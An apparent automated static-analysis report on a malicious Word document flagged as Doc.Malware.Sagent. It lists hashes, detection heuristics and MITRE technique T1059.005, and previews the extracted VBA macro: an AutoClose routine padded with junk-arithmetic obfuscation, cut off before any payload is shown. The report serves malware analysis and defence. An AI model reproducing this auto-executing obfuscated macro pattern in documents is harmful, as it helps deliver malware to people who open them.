Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 94cb389bb385579f…

MALICIOUS

Office (OLE)

173.5 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: af92717ee57b4073702588cee5d22fbe SHA-1: da08dbd94846fb547676c26df9b63a9fb9787cf4 SHA-256: 94cb389bb385579ffc9a5604156b0856354913641a19770c710bedeff01332d7
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing a VBA macro. The presence of the AutoClose macro and the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic indicates that the macro is designed to execute automatically when the document is closed. The ClamAV detection further confirms its malicious nature. The macro's specific payload is obfuscated, but its execution upon document closure is the primary malicious behavior.

Heuristics 5

  • ClamAV: Doc.Malware.Sagent-6697295-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sagent-6697295-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 65922 bytes
SHA-256: b036953f881fe5c59825d56d4a4593b5698f00d03aca7e852a592a55261dd72a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const REpEcoRENilUpiFaHOlYwyWiLIbOvyLIVOGm = 0
Sub AutoClose()
On Error Resume Next
Dim qoMvOMUCAMIvUJeTyvEFUsIsORytgePaSIWA(4)
Dim tYaEzBiFeWOiPVogeMDAegud(4)

If 13 = 13 + (10 * 0) Then
tYaEzBiFeWOiPVogeMDAegud(0) = CLng(9868)
End If
tYaEzBiFeWOiPVogeMDAegud(1) = Sqr(10)
tYaEzBiFeWOiPVogeMDAegud(2) = Month(98689868)
tYaEzBiFeWOiPVogeMDAegud(3) = Fix(9868.1)
Dim WyLUZYkAfmAhifyPAJorapIDEsoNUxIp(4)

If 10 = 10 + (1 * 0) Then
WyLUZYkAfmAhifyPAJorapIDEsoNUxIp(0) = CLng(7447)
End If
WyLUZYkAfmAhifyPAJorapIDEsoNUxIp(1) = Sqr(1)
WyLUZYkAfmAhifyPAJorapIDEsoNUxIp(2) = Month(74477447)
WyLUZYkAfmAhifyPAJorapIDEsoNUxIp(3) = Fix(7447.1)

Dim KiPICAWEPuQiJiYBylIRUfULIFEhOJUjaAC(4)

If 12 = 12 + (1 * 0) Then
KiPICAWEPuQiJiYBylIRUfULIFEhOJUjaAC(0) = CLng(9071)
End If
KiPICAWEPuQiJiYBylIRUfULIFEhOJUjaAC(1) = Sqr(1)
KiPICAWEPuQiJiYBylIRUfULIFEhOJUjaAC(2) = Month(90719071)
KiPICAWEPuQiJiYBylIRUfULIFEhOJUjaAC(3) = Fix(9071.1)
Dim sEVisiZeNiaYSusuiwEbeguJaiuLAjUiEpaNam(4)

If 12 = 12 + (9 * 0) Then
sEVisiZeNiaYSusuiwEbeguJaiuLAjUiEpaNam(0) = CLng(791)
End If
sEVisiZeNiaYSusuiwEbeguJaiuLAjUiEpaNam(1) = Sqr(9)
sEVisiZeNiaYSusuiwEbeguJaiuLAjUiEpaNam(2) = Month(791791)
sEVisiZeNiaYSusuiwEbeguJaiuLAjUiEpaNam(3) = Fix(791.9)
If 11 = 11 + (7 * 0) Then
qoMvOMUCAMIvUJeTyvEFUsIsORytgePaSIWA(0) = CLng(7377)
End If
Dim LUiiSEPiQufUCIdAHAaonyPoJUBodePeTuTUjA(4)

If 12 = 12 + (1 * 0) Then
LUiiSEPiQufUCIdAHAaonyPoJUBodePeTuTUjA(0) = CLng(3006)
End If
LUiiSEPiQufUCIdAHAaonyPoJUBodePeTuTUjA(1) = Sqr(1)
LUiiSEPiQufUCIdAHAaonyPoJUBodePeTuTUjA(2) = Month(30063006)
LUiiSEPiQufUCIdAHAaonyPoJUBodePeTuTUjA(3) = Fix(3006.1)
qoMvOMUCAMIvUJeTyvEFUsIsORytgePaSIWA(1) = Sqr(7)
Dim KYLYXjUNuVEHizQYDiZyaVAtOcYTotIgOq(4)

If 10 = 10 + (1 * 0) Then
KYLYXjUNuVEHizQYDiZyaVAtOcYTotIgOq(0) = CLng(6218)
End If
KYLYXjUNuVEHizQYDiZyaVAtOcYTotIgOq(1) = Sqr(1)
KYLYXjUNuVEHizQYDiZyaVAtOcYTotIgOq(2) = Month(62186218)
KYLYXjUNuVEHizQYDiZyaVAtOcYTotIgOq(3) = Fix(6218.1)
Dim KyXUpaMaDemeDobijefiRuaxeQ(4)

If 12 = 12 + (4 * 0) Then
KyXUpaMaDemeDobijefiRuaxeQ(0) = CLng(9299)
End If
KyXUpaMaDemeDobijefiRuaxeQ(1) = Sqr(4)
KyXUpaMaDemeDobijefiRuaxeQ(2) = Month(92999299)
KyXUpaMaDemeDobijefiRuaxeQ(3) = Fix(9299.4)
qoMvOMUCAMIvUJeTyvEFUsIsORytgePaSIWA(2) = Month(73777377)
Dim DenoVOWWDytQuhuLucovOmurAPOneMu(4)

If 12 = 12 + (9 * 0) Then
DenoVOWWDytQuhuLucovOmurAPOneMu(0) = CLng(1003)
End If
DenoVOWWDytQuhuLucovOmurAPOneMu(1) = Sqr(9)
DenoVOWWDytQuhuLucovOmurAPOneMu(2) = Month(10031003)
DenoVOWWDytQuhuLucovOmurAPOneMu(3) = Fix(1003.9)
qoMvOMUCAMIvUJeTyvEFUsIsORytgePaSIWA(3) = Fix(7377.7)
Dim vOwIVoFytiHIJYgOvYKNUHEBULIwXykuluS(4)

If 10 = 10 + (7 * 0) Then
vOwIVoFytiHIJYgOvYKNUHEBULIwXykuluS(0) = CLng(9000)
End If
vOwIVoFytiHIJYgOvYKNUHEBULIwXykuluS(1) = Sqr(7)
vOwIVoFytiHIJYgOvYKNUHEBULIwXykuluS(2) = Month(90009000)
vOwIVoFytiHIJYgOvYKNUHEBULIwXykuluS(3) = Fix(9000.7)
Dim aaNoVInOtEGowUVNOrUxoBBEFUKaQoKEretvE(4)

If 11 = 11 + (4 * 0) Then
aaNoVInOtEGowUVNOrUxoBBEFUKaQoKEretvE(0) = CLng(7809)
End If
aaNoVInOtEGowUVNOrUxoBBEFUKaQoKEretvE(1) = Sqr(4)
aaNoVInOtEGowUVNOrUxoBBEFUKaQoKEretvE(2) = Month(78097809)
aaNoVInOtEGowUVNOrUxoBBEFUKaQoKEretvE(3) = Fix(7809.4)
Dim QOlYVIKUPybIpnFYriOvYpUSEsohE(4)
Dim CyDexUjeVEGeCaTOssSeFErEfiUsymyQYkIf(4)

If 12 = 12 + (1 * 0) Then
CyDexUjeVEGeCaTOssSeFErEfiUsymyQYkIf(0) = CLng(4570)
End If
CyDexUjeVEGeCaTOssSeFErEfiUsymyQYkIf(1) = Sqr(1)
CyDexUjeVEGeCaTOssSeFErEfiUsymyQYkIf(2) = Month(45704570)
CyDexUjeVEGeCaTOssSeFErEfiUsymyQYkIf(3) = Fix(4570.1)
Dim htIhpAxInoqgUciQekDemefNoSIFivyGOFeZO(4)

If 10 = 10 + (2 * 0) Then
htIhpAxInoqgUciQekDemefNoSIFivyGOFeZO(0) = CLng(3872)
End If
htIhpAxInoqgUciQekDemefNoSIFivyGOFeZO(1) = Sqr(2)
htIhpAxInoqgUciQekDemefNoSIFivyGOFeZO(2) = Month(
... (truncated)